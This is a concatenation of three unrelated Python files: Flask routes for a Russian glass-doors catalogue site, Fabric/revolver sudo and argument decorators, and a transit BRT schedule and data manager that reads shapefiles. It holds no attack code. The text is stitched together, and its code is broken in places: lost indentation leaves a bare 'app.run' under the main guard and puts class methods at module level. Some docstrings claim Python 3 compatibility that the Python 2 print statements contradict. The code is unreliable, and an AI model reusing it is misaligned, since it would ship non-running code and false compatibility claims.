    return render_template('interior/single_loft.html', page_title=title, heading=heading)
@app.route('/interior/single_decor')
def single_decor():
    # Interior product page: ART DÉCOR collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ART DÉCOR"
    return render_template('interior/single_decor.html', page_title=title, heading=heading)
@app.route('/peregorodki')
def peregorodki():
    # Glass partitions catalog page.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ"
    return render_template('peregorodki.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_aluminum')
def single_aluminum():
    # Partition product page: aluminum partitions.
    title = "Мир дверей"
    heading = "АЛЮМИНИЕВЫЕ ПЕРЕГОРОДКИ"
    return render_template('peregorodki/single_aluminum.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_razdvizhnyye')
def single_razdvizhnyye():
    # Partition product page: sliding glass partitions and doors.
    title = "Мир дверей"
    heading = "РАЗДВИЖНЫЕ СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ И ДВЕРИ"
    return render_template('peregorodki/single_razdvizhnyye.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_apartments')
def single_apartments():
    # Partition product page: partitions for apartments.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ ДЛЯ КВАРТИРЫ"
    return render_template('peregorodki/single_apartments.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_mirror')
def single_mirror():
    # Partition product page: mirrored partitions.
    title = "Мир дверей"
    heading = "ЗЕРКАЛЬНЫЕ ПЕРЕГОРОДКИ"
    return render_template('peregorodki/single_mirror.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_smart')
def single_smart():
    # Partition product page: smart-glass partitions.
    title = "Мир дверей"
    heading = "СМАРТ ПЕРЕГОРОДКИ ИЗ СТЕКЛА"
    return render_template('peregorodki/single_smart.html', page_title=title, heading=heading)
@app.route('/peregorodki/single_office')
def single_office():
    # Partition product page: office glass partitions.
    title = "Мир дверей"
    heading = "ОФИСНЫЕ СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ"
    return render_template('peregorodki/single_office.html', page_title=title, heading=heading)
@app.route('/sauna')
def sauna():
    # Sauna/bath doors catalog page.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ДЛЯ САУНЫ И БАНИ"
    return render_template('sauna.html', page_title=title, heading=heading)
@app.route('/sauna/single_ajio')
def single_ajio():
    # Sauna product page: AJIO doors.
    # NOTE(review): heading reads "office glass partitions" on a sauna page --
    # presumably a copy-paste leftover; confirm the intended heading.
    title = "Мир дверей"
    heading = "ОФИСНЫЕ СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ"
    return render_template('sauna/single_ajio.html', page_title=title, heading=heading)
@app.route('/sauna/single_sauna_light')
def single_sauna_light():
    # Sauna product page: LIGHT bath doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ LIGHT ДЛЯ БАНИ"
    return render_template('sauna/single_sauna_light.html', page_title=title, heading=heading)
@app.route('/sauna/single_steam')
def single_steam():
    # Sauna product page: steam-room doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ В ПАРНУЮ"
    return render_template('sauna/single_steam.html', page_title=title, heading=heading)
@app.route('/sauna/single_glassjet')
def single_glassjet():
    # Sauna product page: GLASSJET doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ GLASSJET ДЛЯ САУНЫ"
    return render_template('sauna/single_glassjet.html', page_title=title, heading=heading)
@app.route('/sauna/single_hamam')
def single_hamam():
    # Sauna product page: hammam doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ХАМАМ"
    return render_template('sauna/single_hamam.html', page_title=title, heading=heading)
@app.route('/sauna/single_glassjet_colored')
def single_glassjet_colored():
    # Sauna product page: colored GLASSJET doors.
    title = "Мир дверей"
    heading = "ЦВЕТНЫЕ СТЕКЛЯННЫЕ ДВЕРИ GLASSJET"
    return render_template('sauna/single_glassjet_colored.html', page_title=title, heading=heading)
@app.route('/showers')
def showers():
    # Shower enclosures catalog page.
    title = "Мир дверей"
    heading = "ДУШЕВЫЕ ОГРАЖДЕНИЯ ИЗ СТЕКЛА"
    return render_template('showers.html', page_title=title, heading=heading)
@app.route('/showers/single_corners')
def single_corners():
    # Shower product page: corner enclosures.
    title = "Мир дверей"
    heading = "ДУШЕВЫЕ УГОЛКИ ИЗ СТЕКЛА"
    return render_template('showers/single_corners.html', page_title=title, heading=heading)
@app.route('/showers/single_nishu')
def single_nishu():
    # Shower product page: alcove (niche) doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДУШЕВЫЕ ДВЕРИ В НИШУ"
    return render_template('showers/single_nishu.html', page_title=title, heading=heading)
@app.route('/showers/single_soul')
def single_soul():
    # Shower product page: shower doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ДЛЯ ДУША"
    return render_template('showers/single_soul.html', page_title=title, heading=heading)
@app.route('/showers/single_shower_partitions')
def single_shower_partitions():
    # Shower product page: fixed shower partitions.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ПЕРЕГОРОДКИ ДЛЯ ДУША"
    return render_template('showers/single_shower_partitions.html', page_title=title, heading=heading)
@app.route('/showers/single_glass_partitions')
def single_glass_partitions():
    # Shower product page: sliding shower partitions.
    title = "Мир дверей"
    heading = "РАЗДВИЖНЫЕ ДУШЕВЫЕ ПЕРЕГОРОДКИ ИЗ СТЕКЛА"
    return render_template('showers/single_glass_partitions.html', page_title=title, heading=heading)
@app.route('/showers/single_bathroom_blinds')
def single_bathroom_blinds():
    # Shower product page: bathroom blinds.
    # NOTE(review): heading duplicates single_glass_partitions ("sliding shower
    # partitions") -- presumably copy-paste; confirm the intended heading.
    title = "Мир дверей"
    heading = "РАЗДВИЖНЫЕ ДУШЕВЫЕ ПЕРЕГОРОДКИ ИЗ СТЕКЛА"
    return render_template('showers/single_bathroom_blinds.html', page_title=title, heading=heading)
@app.route('/mirrors')
def mirrors():
    # Mirrors catalog page.
    title = "Мир дверей"
    heading = "ЗЕРКАЛА"
    return render_template('mirrors.html', page_title=title, heading=heading)
@app.route('/mirrors/single_led')
def single_led():
    # Mirror product page: LED-backlit mirrors.
    title = "Мир дверей"
    heading = "ЗЕРКАЛА С LED ПОДСВЕТКОЙ"
    return render_template('mirrors/single_led.html', page_title=title, heading=heading)
@app.route('/mirrors/single_aralia')
def single_aralia():
    # Mirror product page: Aralia bathroom mirror.
    title = "Мир дверей"
    heading = "Зеркало в ванную Aralia"
    return render_template('mirrors/single_aralia.html', page_title=title, heading=heading)
@app.route('/mirrors/single_classic_mirrors')
def single_classic_mirrors():
    # Mirror product page: classic home mirrors.
    title = "Мир дверей"
    heading = "КЛАССИЧЕСКИЕ ЗЕРКАЛА ДЛЯ ДОМА"
    return render_template('mirrors/single_classic_mirrors.html', page_title=title, heading=heading)
@app.route('/mirrors/single_mirror_tiles')
def single_mirror_tiles():
    # Mirror product page: beveled mirror tiles.
    title = "Мир дверей"
    heading = "ЗЕРКАЛЬНАЯ ПЛИТКА С ФАЦЕТОМ"
    return render_template('mirrors/single_mirror_tiles.html', page_title=title, heading=heading)
@app.route('/mirrors/single_exclusive')
def single_exclusive():
    # Mirror product page: exclusive mirrors.
    # NOTE(review): heading duplicates single_mirror_tiles ("beveled mirror
    # tiles") -- presumably copy-paste; confirm the intended heading.
    title = "Мир дверей"
    heading = "ЗЕРКАЛЬНАЯ ПЛИТКА С ФАЦЕТОМ"
    return render_template('mirrors/single_exclusive.html', page_title=title, heading=heading)
@app.route('/mirrors/single_sophistication')
def single_sophistication():
    # Mirror product page: SOPHISTICATION designer collection.
    title = "Мир дверей"
    heading = "КОЛЛЕКЦИЯ ЗЕРКАЛ SOPHISTICATION ДЛЯ ДИЗАЙНЕРОВ"
    return render_template('mirrors/single_sophistication.html', page_title=title, heading=heading)
@app.route('/constructions')
def constructions():
    # Custom glass constructions catalog page.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ КОНСТРУКЦИИ НА ЗАКАЗ"
    return render_template('constructions.html', page_title=title, heading=heading)
@app.route('/constructions/single_pendulum')
def single_pendulum():
    # Constructions product page: pendulum (swing) glass doors.
    title = "Мир дверей"
    heading = "МАЯТНИКОВЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
    return render_template('constructions/single_pendulum.html', page_title=title, heading=heading)
@app.route('/constructions/single_stairs')
def single_stairs():
    # Constructions product page: glass stairs and railings.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ЛЕСТНИЦЫ И ОГРАЖДЕНИЯ"
    return render_template('constructions/single_stairs.html', page_title=title, heading=heading)
@app.route('/constructions/single_aprons')
def single_aprons():
    # Constructions product page: glass kitchen backsplashes (skinali).
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ФАРТУКИ СКИНАЛИ"
    return render_template('constructions/single_aprons.html', page_title=title, heading=heading)
@app.route('/constructions/single_office_rooms')
def single_office_rooms():
    # Constructions product page: glass office meeting rooms.
    title = "Мир дверей"
    heading = "ПЕРЕГОВОРНЫЕ ДЛЯ ОФИСА ИЗ СТЕКЛА"
    return render_template('constructions/single_office_rooms.html', page_title=title, heading=heading)
@app.route('/constructions/single_cabinets')
def single_cabinets():
    # Constructions product page: glass cabinets/offices.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ КАБИНЕТЫ"
    return render_template('constructions/single_cabinets.html', page_title=title, heading=heading)
@app.route('/installation')
def installation():
    # Installation services page.
    # NOTE(review): heading duplicates the constructions page ("custom glass
    # constructions") -- presumably copy-paste; confirm the intended heading.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ КОНСТРУКЦИИ НА ЗАКАЗ"
    return render_template('installation.html', page_title=title, heading=heading)
if __name__=="__main__":
app.run(debug=False)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, with_statement
from functools import wraps
from fabric.decorators import (task, hosts, roles, runs_once, serial,
parallel, with_settings)
from fabric.network import needs_host
from revolver.core import env
from revolver import contextmanager as ctx
def sudo(func):
    """Decorator: run the wrapped function inside the revolver sudo context.

    Fixed: the wrapper now propagates the wrapped function's return value,
    which was previously dropped.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        with ctx.sudo():
            return func(*args, **kwargs)
    return wrapper
def multiargs(func):
    """Decorator: allow the first positional argument to be a list or tuple.

    When the first argument is a tuple/list, ``func`` is applied to each
    element and a list of results is returned; otherwise ``func`` is called
    normally.

    Fixed: the original used ``map``, which returns a list on Python 2 but a
    lazy iterator on Python 3; a list comprehension keeps the eager list
    semantics on both.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        if len(args) == 0:
            return func()
        arg = args[0]
        args = args[1:]
        if type(arg) in (tuple, list):
            return [func(element, *args, **kwargs) for element in arg]
        return func(arg, *args, **kwargs)
    return wrapper
def inject_use_sudo(func):
    """Decorator: default ``use_sudo``/``sudo`` kwargs from env.sudo_forced.

    Inspects the wrapped function's positional parameter names and, when the
    caller did not pass the flag explicitly, injects the globally forced
    sudo setting.

    Fixed: uses ``func.__code__`` (available since Python 2.6) instead of
    the Python-2-only ``func.func_code`` attribute.
    """
    @wraps(func)
    def inject_wrapper(*args, **kwargs):
        code = func.__code__
        func_args = code.co_varnames[:code.co_argcount]
        # Fabric-style API
        if "use_sudo" not in kwargs and "use_sudo" in func_args:
            kwargs["use_sudo"] = env.sudo_forced
        # Cuisine-style API
        if "sudo" not in kwargs and "sudo" in func_args:
            kwargs["sudo"] = env.sudo_forced
        return func(*args, **kwargs)
    return inject_wrapper
|
import os
import shapefile
import time
from constants import KEY
from geometry import Polyline
from geometry import Point
from dataset import SERVICE, SERVICES
from dataset import BAD_STOP_IDS_BRT
from dataset import DATASETS
from dataset import OPEN_DATA_ROUTE_FILTER
from stop_updates import STOP_UPDATES, NEW_STOPS
from transit_trips import TransitTrips
from transit_shapes import TransitShapes
from transit_objects import TransitStop
from transit_objects import TransitRoute
from stop_times import StopTimes
from my_utils import seconds_to_depart_time
from brt_schedule import BRT_SCHEDULE
class BrtSchedule(object):
    """Headway-based schedule lookups for BRT routes.

    Built from the hand-entered BRT_SCHEDULE dict: keys are comma-separated
    route numbers, values map day codes ('m', 'sa', 'sn') to lists of
    (start_hour, end_hour, headway_minutes) tuples.  Times are converted
    internally to minutes past midnight.
    """
    def __init__(self, get_route_callback):
        # self._dataman = dataman
        # route number -> {service: [(start_min, end_min, headway_min), ...] or None}
        self._data = {}
        # Callback resolving a route_id into a route object.
        self._get_route_callback = get_route_callback
        for key, value in BRT_SCHEDULE.iteritems():
            # print key, value
            # Convert the keys from entered to internal
            data = {
                SERVICE.MWF : value.get('m'),
                SERVICE.SAT : value.get('sa'),
                SERVICE.SUN : value.get('sn'),
            }
            data = self._init_times(data)
            # Since the entered dict keys specify multiple routes, this makes a copy
            # for each route
            # (NOTE: all routes in the key actually share the same dict object,
            # which is fine because it is never mutated after this point)
            key_parts = key.split(",")
            for part in key_parts:
                route_number = int(part.strip())
                self._data[route_number] = data
        # for key, value in self._data.iteritems():
        #     print "KEY", key, "VALUE", repr(value)
    def _convert_times(self, data):
        """Convert (start_hour, end_hour, headway) tuples to minute-based tuples.

        Returns None when data is None (no service that day).  The end time
        becomes end_hour*60 - 1 so adjacent ranges do not overlap.
        """
        result = []
        if data is None:
            return
        for item in data:
            # The items are tuples of format (start_time, end_time, minutes_between departures)
            # All times are even hours that is, ints)
            item_new = (item[0] * 60, (item[1] * 60) - 1, item[2])
            # print "fix", item, "--->", item_new
            result.append(item_new)
        return result
    def _init_times(self, data):
        """Run _convert_times over every service key (in place) and return data."""
        # print "convert times for", repr(data)
        for service in SERVICES:
            data[service] = self._convert_times(data.get(service))
        return data
    def _get_time_minutes(self, time_str):
        """Parse 'H' or 'H:MM' into minutes past midnight; raise ValueError otherwise."""
        parts = time_str.split(":")
        if len(parts) == 1:
            # This is just an hour specification
            result = 60 * int(parts[0])
        elif len(parts) == 2:
            result = 60 * int(parts[0]) + int(parts[1])
        else:
            raise ValueError("Invalid time string: %s" % repr(time_str))
        # print "time: %s --> %d" % (time_str, result)
        return result
    def _get_route_number(self, route):
        """Return the route number for either a route object or a route_id int."""
        # Handle passed in routes or route_ids
        if isinstance(route, int):
            route = self._get_route_callback(route)
        return route.get_number()
    def _find_tuples(self, route_number, service):
        """Return the (start, end, headway) list for route/service, or None."""
        data = self._data.get(route_number)
        if data is None:
            raise ValueError("Cant find data for route: %s" % repr(route_number))
        return data.get(service)
    def _find_tuple(self, route_number, service, minutes):
        """Return the schedule tuple covering the given minute of day, or None."""
        data = self._data.get(route_number)
        if data is None:
            raise ValueError("Cant find data for route: %s" % repr(route_number))
        s = data.get(service)
        if not s:
            return
        for item in s:
            # print "Consider item", item
            if minutes >= item[0] and minutes <= item[1]:
                return item
    def get_departs_per_hour(self, route, service, time_str):
        """Departures per hour at the given time, or 0 when not in service."""
        t = self._get_time_minutes(time_str)
        route_number = self._get_route_number(route)
        item = self._find_tuple(route_number, service, t)
        if item is None:
            return 0
        # print "Found tuple", item
        result = 60.0 / float(item[2])
        return result
    def get_departs_per_day(self, route, service):
        """Estimated number of departures for one service day (0 when no service)."""
        route_number = self._get_route_number(route)
        tuples = self._find_tuples(route_number, service)
        if tuples is None:
            return 0
        total = 0.0
        # The tuples are (start_time (minutes), stop_time (minutes), and interval (minutes)
        # Therefore, the total number of departures is estimated to be
        # ( end_time - start_time ) / interval
        #
        # Of course this can result in a floating point number, which is fine for upper level
        # computations
        for item in tuples:
            # print "depart per day process item:", item
            total += (float(item[1]) - float(item[0])) / float(item[2])
        return total
    def get_departs_per_week(self, route):
        """Sum of one weekday's, Saturday's and Sunday's departures.

        NOTE(review): a calendar week has five MWF-type days; if a true weekly
        total is intended the weekday term presumably needs a factor of 5 --
        confirm against callers before changing.
        """
        total = self.get_departs_per_day(route, SERVICE.MWF)
        total += self.get_departs_per_day(route, SERVICE.SAT)
        total += self.get_departs_per_day(route, SERVICE.SUN)
        return total
    def get_depart_wait_minutes(self, route, service, time_str):
        """Average wait in minutes (half the headway), or None when not in service."""
        t = self._get_time_minutes(time_str)
        route_number = self._get_route_number(route)
        item = self._find_tuple(route_number, service, t)
        if item is None:
            return None
        # print "Found tuple", item
        # Item 2 is the departure frequency in minutes...
        # so average wait time is frequency/2
        result = float(item[2])/2.0
        return result
class DatamanBase(object):
    """Common route/stop bookkeeping shared by the transit data managers.

    Subclasses populate ``_route_dict`` / ``_stop_dict`` and implement the
    schedule-query methods below.

    Fixed: ``get_stops`` and ``get_route_ids`` were each defined twice (an
    abstract NotImplementedError version silently shadowed by the concrete
    one later in the class body) -- the dead duplicates are removed; the
    Python-2-only ``iterkeys``/``itervalues`` calls are replaced with forms
    that behave identically on Python 2 and 3.
    """

    def __init__(self, dataset):
        # Filesystem root for the selected dataset.
        self._base_path = DATASETS.get(dataset)
        self._route_dict = {}
        self._stop_dict = {}

    # ---- schedule queries: implemented by subclasses -------------------
    def get_depart_wait_minutes(self, route, direction, stop, service, time_str):
        raise NotImplementedError

    def get_departs_per_hour(self, route, direction, stop, service, time_str):
        raise NotImplementedError

    def get_departs_per_day(self, route, direction, stop, service):
        raise NotImplementedError

    def get_departs_per_week(self, route, direction, stop):
        raise NotImplementedError

    def get_segments(self, route_id):
        raise NotImplementedError

    # ---- shared concrete helpers ---------------------------------------
    def make_round_buffers(self, radius):
        """Create a circular buffer of the given radius around every stop."""
        for stop in self.get_stops():
            stop.make_round_buffer(radius)

    def get_route(self, route_id):
        """Return the route object for route_id, or None if unknown."""
        return self._route_dict.get(route_id)

    def get_stop(self, stop_id):
        """Return the stop object for stop_id; raise ValueError if unknown."""
        stop = self._stop_dict.get(stop_id)
        if stop is None:
            raise ValueError("Can't find stop id: %d" % stop_id)
        return stop

    def get_route_ids(self):
        """Return all known route ids as a list."""
        return list(self._route_dict)

    def get_routes(self):
        """Return all route objects as a list."""
        return list(self._route_dict.values())

    def get_stops(self):
        """Return all stop objects as a list."""
        return list(self._stop_dict.values())

    def get_route_name(self, route_id):
        """Return the display name of the given route."""
        return self.get_route(route_id).get_name()

    def get_route_number(self, route_id):
        """Return the public route number of the given route."""
        return self.get_route(route_id).get_number()
class DatamanBrt(DatamanBase):
"""
This manager processes the transit data as supplied in shapefiles (e.g., the BRT data)
"""
    def __init__(self, dataset):
        """Load routes, stops and manual fix-ups for the given BRT dataset."""
        super(DatamanBrt, self).__init__(dataset)
        print "TransitShapefile: %s" % self._base_path
        # Maps human direction names to the 2-letter codes used downstream.
        self._dir_dict = {
            "inbound" : "IB",
            "outbound" : "OB",
            "cw" : "CW",
            "ccw" : "CC"
        }
        # Caches for stops that serve at least one route (filled lazily).
        self._active_stop_ids = []
        self._active_stops = []
        self.read_directions()
        self.read_stops()
        self.read_direction_stops()
        # IDs at/above this base are synthesized for manually created stops.
        self._created_stop_id_base = 20000
        self.add_new_stops(dataset)
        self.apply_stop_updates(dataset)
        self._schedule = BrtSchedule(self.get_route)
        # After dictionaries built, cross-link them
        for route in self._route_dict.itervalues():
            route.set_stop_dict(self._stop_dict)
        for stop in self._stop_dict.itervalues():
            stop.set_route_dict(self._route_dict)
def get_depart_wait_minutes(self, route, direction, stop, service, time_str):
if direction != 0: return None
return self._schedule.get_depart_wait_minutes(route, service, time_str)
def get_departs_per_hour(self, route, direction, stop, service, time_str):
if direction != 0: return None
return self._schedule.get_departs_per_hour(route, service, time_str)
def get_departs_per_day(self, route, direction, stop, service):
if direction != 0: return None
return self._schedule.get_departs_per_day(route, service)
def get_departs_per_week(self, route, direction, stop):
"""
Note: The stop is not sent down to the lower level because unlike the open data,
the number of departures is the same for all stops on the route
"""
if direction != 0: return None
return self._schedule.get_departs_per_week(route)
    def apply_stops_added(self, added_stops, route_id):
        """Attach each stop description in added_stops to the given route.

        Entries with a STOP_ID reference an existing stop; entries with only
        LAT/LNG create a new stop with a synthesized id.
        """
        route = self._route_dict.get(route_id)
        for added_stop in added_stops:
            print "CONSIDER ADDED STOP", added_stop
            stop_id = added_stop.get(KEY.STOP_ID)
            if stop_id is None:
                print "THIS MUST BE A LAT/LON stop"
                lat = added_stop.get(KEY.LAT)
                lng = added_stop.get(KEY.LNG)
                if lat is None or lng is None:
                    raise ValueError("Bad Stop!")
                # Synthesize an id for the manually created stop.
                stop_id = self._created_stop_id_base
                self._created_stop_id_base += 1
                name = "Manually Created Stop: %s" % repr(stop_id)
                stop = TransitStop(stop_id, name, Point(lat, lng))
                if self._stop_dict.has_key(stop_id):
                    raise ValueError("Duplicate stop_id: %s" % repr(stop_id))
                self._stop_dict[stop_id] = stop
            else:
                print "Assign existing stop %d to route %d" % (stop_id, route_id)
                stop = self.get_stop(stop_id)
                # Assign this existing stop to the route
                if stop.serves_route(route):
                    # It would be OK to "re-add" existing stop but this exception
                    # just helps to keep things clean
                    raise ValueError("Stop %d already serves route %d" % (stop_id, route_id))
                else:
                    stop.manually_add_route(route_id)
            route.manually_add_stop(stop_id)
            print repr(stop)
def apply_stops_removed(self, removed_stops, route_id):
route = self._route_dict.get(route_id)
for removed_stop in removed_stops:
stop_id = removed_stop.get(KEY.STOP_ID)
stop = self._stop_dict.get(stop_id)
if stop is None:
raise ValueError("Bad stop!! stop_id: %s" % repr(stop_id))
stop.manually_remove_route(route_id)
route.manually_remove_stop(stop_id)
    def apply_stop_updates(self, dataset):
        """Apply the manual STOP_UPDATES fix-ups (adds/removes/renames) for dataset."""
        stop_updates = STOP_UPDATES.get(dataset, [])
        for item in stop_updates:
            route_id = item.get(KEY.ROUTE_ID)
            print "Considering route:", route_id
            added_stops = item.get(KEY.STOPS_ADDED)
            self.apply_stops_added(added_stops, route_id)
            removed_stops = item.get(KEY.STOPS_REMOVED)
            self.apply_stops_removed(removed_stops, route_id)
            # Optional manual route rename.
            route_name = item.get(KEY.NAME)
            if route_name is not None:
                route = self.get_route(route_id)
                route.set_name(route_name)
    def add_new_stops(self, dataset):
        """Create the manually specified NEW_STOPS (id -> {lat, lng}) for dataset."""
        new_stops = NEW_STOPS.get(dataset, {})
        for stop_id, location in new_stops.iteritems():
            print "Add stop: %d %s" % (stop_id, location)
            lat = location.get(KEY.LAT)
            lng = location.get(KEY.LNG)
            if lat is None or lng is None:
                raise ValueError("Bad Stop!")
            name = "Manually Created Stop: %s" % repr(stop_id)
            stop = TransitStop(stop_id, name, Point(lat, lng))
            self._stop_dict[stop_id] = stop
def get_active_stops(self):
    """Return stops that serve at least one route (lazily computed)."""
    if len(self._active_stops) == 0:
        # Building the id list also populates self._active_stops
        self.get_active_stop_ids()
    return self._active_stops
def get_active_stop_ids(self):
    """Return ids of stops serving at least one route; fills the caches once."""
    if self._active_stop_ids:
        return self._active_stop_ids
    for sid, transit_stop in self._stop_dict.iteritems():
        # A stop is "active" when it is linked to one or more routes
        if transit_stop.get_route_ids():
            self._active_stop_ids.append(sid)
            self._active_stops.append(transit_stop)
    return self._active_stop_ids
def get_segments(self, route_id):
    """Return the polyline segments stored on the given route."""
    return self.get_route(route_id).get_segments()
# def get_stop(self, stop_id):
# return self._stop_dict.get(stop_id)
# def get_routes(self):
# return [route for route in self._route_dict.itervalues()]
def get_route_stops(self, route_id):
    """Return TransitStop objects for each stop on the route, in route order."""
    target_route = self.get_route(route_id)
    stops = []
    for sid in target_route.get_stop_ids():
        stops.append(self.get_stop(sid))
    return stops
# def get_stops(self):
# return [stop for stop in self._stop_dict.itervalues()]
# def get_route_ids(self):
# result = [k for k in self._route_dict.iterkeys()]
# return result
def read_directions(self):
    """Load route definitions from the directions shapefile.

    Populates self._route_dict with TransitRoute objects, one per record.
    Raises ValueError on a duplicate route id.
    """
    sf = shapefile.Reader("%s/directions.dbf" % self._base_path)
    records = sf.records()
    shapes = sf.shapes()
    for index, record in enumerate(records):
        shape = shapes[index]
        # Field 5 is "<route number><space><route name>"; split at first space
        name = record[5].strip()
        space_pos = name.find(' ')
        route_number = int(name[:space_pos])
        name = name[space_pos:]
        # Field 2 holds the direction keyword, mapped via self._dir_dict
        d = record[2].strip().lower()
        direction = self._dir_dict.get(d)
        display_name = "%s (%s)" % (name.strip(), direction)
        route_id = int(record[1])
        if self._route_dict.has_key(route_id):
            raise ValueError("Already have route key")
        # Shapefile points are (lng, lat); Point takes (lat, lng), hence the swap
        segment = Polyline()
        for p in shape.points:
            segment.add_point(Point(p[1], p[0]))
        route = TransitRoute(route_id, route_number, display_name)
        route.add_segment(segment)
        route.set_attribute(KEY.DIRECTION, direction)
        self._route_dict[route_id] = route
def read_direction_stops(self):
    """Parse the direction_stops DBF and cross-link stops to routes.

    The file is read as raw text (not via the shapefile library); line 2
    carries all the data as whitespace-separated triples of
    (route_id, stop_id, distance). Example of the underlying record form:

    ['1424e21', 'HDR Future Network V3', '4174', 'Superstore',
     "10 Mainline, Confederation - Centre Mall (Inbound),
      14 Crosstown, St Paul's (Outbound),
      3 BRT, Green (Inbound),
      48 Suburban Connector, 33rd St - Confed (Inbound)"]
    """
    line_count = 0
    file_name = "%s/direction_stops.dbf" % self._base_path
    print "Reading file: %s..." % file_name
    f = open(file_name, 'rb')
    for line in f:
        line_count += 1
        if line_count > 2:
            print "line", line
        if line_count == 2:
            parts = line.split()
            part_count = len(parts)
            print "Total part count: %d" % len(parts)
            # First pass: validate that every token (after the header token)
            # is numeric, or one of the known non-numeric stop-name fragments
            for i, part in enumerate(parts):
                if i == 0 : continue
                success = False
                try:
                    float(part)
                    success = True
                except:
                    # Known stop-name words that legitimately appear among
                    # the numeric tokens
                    if part.find("remix") >= 0:
                        success = True
                    elif part.find("Market") >= 0:
                        success = True
                    elif part.find("Mall") >= 0:
                        success = True
                if not success:
                    raise ValueError("Failed on part: %s" % part)
            # Second pass: walk tokens in (route_id, stop_id, dist) triples
            part_index = 1
            while True:
                if part_index >= part_count:
                    print "DONE"
                    break
                route_id = int(parts[part_index].strip())
                stop_id = parts[part_index + 1].strip()
                # "Market Mall" splits into two tokens; re-join and skip one
                if stop_id == "Market":
                    part_index += 1
                    stop_id = "Market Mall"
                try:
                    stop_id = int(stop_id)
                except:
                    # Non-numeric stop ids are translated via BAD_STOP_IDS_BRT
                    print "Attempt to get stop_id from BAD_STOP_IDS", stop_id
                    stop_id = BAD_STOP_IDS_BRT.get(stop_id)
                    stop_id = int(stop_id)
                # Cross-link both directions: stop -> route and route -> stop
                stop = self._stop_dict.get(stop_id)
                stop.add_route_id(route_id)
                route = self._route_dict.get(route_id)
                route.add_stop_id(stop_id)
                # Distance field is parsed but currently unused
                dist = parts[part_index + 2].strip()
                part_index += 3
    f.close()
    for route_id, route in self._route_dict.iteritems():
        print "Route: %d Name: %s Stops: %d" % (route.get_number(), route.get_name(), len(route.get_stop_ids()))
    print "Total number of routes", len(self._route_dict)
    print "Done reading %s" % file_name
def read_stops(self):
    """Load stops from the stops shapefile into self._stop_dict.

    Non-numeric stop ids are mapped through BAD_STOP_IDS_BRT; stops whose
    id cannot be resolved at all are skipped. Raises ValueError on a
    duplicate stop id.
    """
    file_name = "%s/stops.dbf" % self._base_path
    print "Reading stops file: %s" % file_name
    sf = shapefile.Reader(file_name)
    records = sf.records()
    shapes = sf.shapes()
    # Counter kept from an earlier id-fabrication scheme; currently unused
    made_up_id = 10000
    print "len(records)", len(records)
    print "len(shapes)", len(shapes)
    for index, record in enumerate(records):
        shape = shapes[index]
        # Point shapes carry a single coordinate pair as (lng, lat)
        point = shape.points[0]
        lat = point[1]
        lng = point[0]
        stop_id = record[2]
        stop_name = record[3]
        # Field 4 (serving lines) is read but not currently used
        lines = record[4]
        bad_id = None
        try:
            stop_id = int(stop_id)
        except:
            # Non-numeric id: translate via the known bad-id table
            stop_id = BAD_STOP_IDS_BRT.get(record[2])
            if stop_id is None:
                print "FAILED TO GET STOP ID for", record[2]
                continue
            bad_id = record[2]
        stop = TransitStop(stop_id, stop_name, Point(float(lat), float(lng)))
        if bad_id is not None:
            # Remember the original (non-numeric) id for traceability
            stop.set_attribute(KEY.BAD_ID, bad_id)
        if self._stop_dict.has_key(stop_id):
            raise ValueError("already have stop id: %s %d" % (repr(stop_id), index))
        self._stop_dict[stop_id] = stop
    for stop_id, stop in self._stop_dict.iteritems():
        point = stop.get_point()
        name = stop.get_name()
        print "stop_id: %d name: %s lat:%f lng: %f" % (stop_id, name, point.get_lat(), point.get_lng())
    print "Read %d stops" % len(self._stop_dict)
def get_stop_points(self, route_id):
    """Return the point for each stop on the given route.

    NOTE(review): this method accesses route/stop entries with dict-style
    .get("stops") / .get('point'), while the readers above store
    TransitRoute / TransitStop objects (compare get_route_stops, which uses
    route.get_stop_ids() and stop objects). Confirm whether this method is
    dead code or needs porting to the object API.
    """
    result = []
    data = self._route_dict.get(route_id)
    stops = data.get("stops")
    for stop_id in stops:
        stop_data = self._stop_dict.get(stop_id)
        if stop_data is None:
            print "ERROR: no data for stop", repr(stop_id)
            continue
        point = stop_data.get('point')
        result.append(point)
    return result
def dataman_factory(dataset, link_route_shapes=False, link_stops=True):
    """Build the data manager appropriate for the given dataset.

    Datasets with an OPEN_DATA_ROUTE_FILTER entry get the open-data manager;
    all other supported datasets get the BRT manager. Raises ValueError for
    an unknown dataset.
    """
    if DATASETS.get(dataset) is None:
        raise ValueError("dataset not supported: %s" % repr(dataset))
    if OPEN_DATA_ROUTE_FILTER.get(dataset) is None:
        return DatamanBrt(dataset)
    return DataManagerOpen(dataset, link_route_shapes=link_route_shapes,
                           link_stops=link_stops)
class DataManagerOpen(DatamanBase):
    """
    Data manager backed by the GTFS-style open-data CSV exports.

    link_route_shapes : Get route shapes for plotting. Not required for heatmap.
